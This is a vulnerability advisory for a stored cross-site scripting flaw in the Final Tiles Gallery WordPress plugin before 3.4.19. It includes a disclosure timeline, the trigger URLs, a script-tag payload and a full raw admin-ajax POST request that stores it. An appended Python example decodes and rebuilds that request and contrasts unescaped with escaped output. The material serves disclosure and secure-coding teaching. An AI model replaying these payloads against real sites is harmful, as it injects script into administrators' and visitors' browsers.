Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)

WPEX-ID: D597A4A6-FDD1-4629-9F4F-6B7A9114C65A
Author: Ngo Van Thien
Published: May 28, 2020
EPSS: 0.001 (Low), percentile 31.2%

Final Tiles Gallery 3.4.18 and lower does not sanitise the Title and Caption fields of a gallery image, so an authenticated user with the Author role or above can inject arbitrary web script or HTML. The payload is stored and executes whenever the gallery is viewed, either in the plugin's admin page or in a post that embeds the gallery, including by administrators and other users.

Timeline (WPScanTeam):
- May 14th, 2020 - Issue confirmed, vendor contacted (via https://www.machothemes.com/contact-us-now/) and given 14 days to respond before escalating to the WordPress plugins team.
- May 27th, 2020 - v3.4.19 released, fixing the issue.

#XSS TRIGGER POINT: the payload fires when an admin or another authenticated user loads the gallery in the plugin's admin page, or when a post embedding the gallery shortcode [FinalTilesGallery id='3'] is viewed, e.g.:
https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/


Add an image to a gallery from the plugin, then put the payload <script>alert(/XSS/)</script> in the Title and Caption fields. The save request sent by the gallery admin page looks like this (the imageTitle and description parameters carry the payload):

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7

source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0
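The following is an added example in Python; it is not code from the advisory or from the Final Tiles Gallery plugin. It decodes the PoC save_image body above to show exactly what gets stored, rebuilds such a body with values of your choosing for lab replay, and contrasts an unescaped gallery rendering (the vulnerable pattern the advisory describes) with a context-aware escaped one. The HTML template, the helper names, and the assumption that FinalTiles_gallery carries the request nonce are all assumptions made here, not facts about the plugin's real markup.

```python
"""Added example, not code from the advisory or from the Final Tiles Gallery
plugin: decode the PoC save_image body, then contrast an unescaped gallery
rendering (the vulnerable pattern the advisory describes) with an escaped one.
The HTML template below is an assumption; the plugin's real markup differs."""
import html
from urllib.parse import parse_qs, urlencode

# Constructed copy of the PoC request body from the advisory. The
# FinalTiles_gallery value is assumed to be the per-session nonce; replace it
# (and the session cookie) with your own when replaying in a lab.
POC_BODY = (
    "source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2"
    "&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg"
    "&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E"
    "&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E"
    "&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0"
)


def parse_save_image(body: str) -> dict:
    """Decode the admin-ajax form body into a flat {field: value} dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_save_image(nonce: str, img_url: str, title: str, caption: str,
                     gallery_id: int, img_id: int) -> str:
    """Rebuild a save_image body with chosen values (same field set as the PoC)."""
    params = {
        "source": "images", "action": "save_image", "FinalTiles_gallery": nonce,
        "img_url": img_url, "imageTitle": title, "description": caption,
        "alt": "alttext", "link": "", "target": "", "id": gallery_id,
        "type": "image", "img_id": img_id, "sortOrder": 1, "filters": "",
        "post_id": 0,
    }
    return urlencode(params)


def render_unsafe(img: dict) -> str:
    """Vulnerable pattern: stored fields concatenated straight into markup."""
    return (f'<figure><img src="{img["img_url"]}" alt="{img["alt"]}" '
            f'title="{img["imageTitle"]}">'
            f'<figcaption>{img["description"]}</figcaption></figure>')


def render_escaped(img: dict) -> str:
    """Fixed pattern: escape each field for the context it lands in.

    Attribute values get html.escape(quote=True) (WordPress: esc_attr()),
    element text gets html.escape() (WordPress: esc_html()). Escaping alone
    does not validate the src URL scheme; in WordPress use esc_url() for it.
    """
    def attr(s: str) -> str:
        return html.escape(s, quote=True)

    return (f'<figure><img src="{attr(img["img_url"])}" alt="{attr(img["alt"])}" '
            f'title="{attr(img["imageTitle"])}">'
            f'<figcaption>{html.escape(img["description"])}</figcaption></figure>')


def has_raw_script_tag(markup: str) -> bool:
    """Cheap check: does a live <script> tag survive rendering?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    img = parse_save_image(POC_BODY)
    print("stored title  :", img["imageTitle"])
    print("stored caption:", img["description"])
    print("vulnerable    :", render_unsafe(img))
    print("escaped       :", render_escaped(img))
```

Note that the fix is output-side: escaping on storage would still leave the admin page vulnerable wherever the plugin echoes the raw stored value, and escaping for the wrong context (esc_html() inside an attribute, or no URL validation on src) leaves a bypass.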

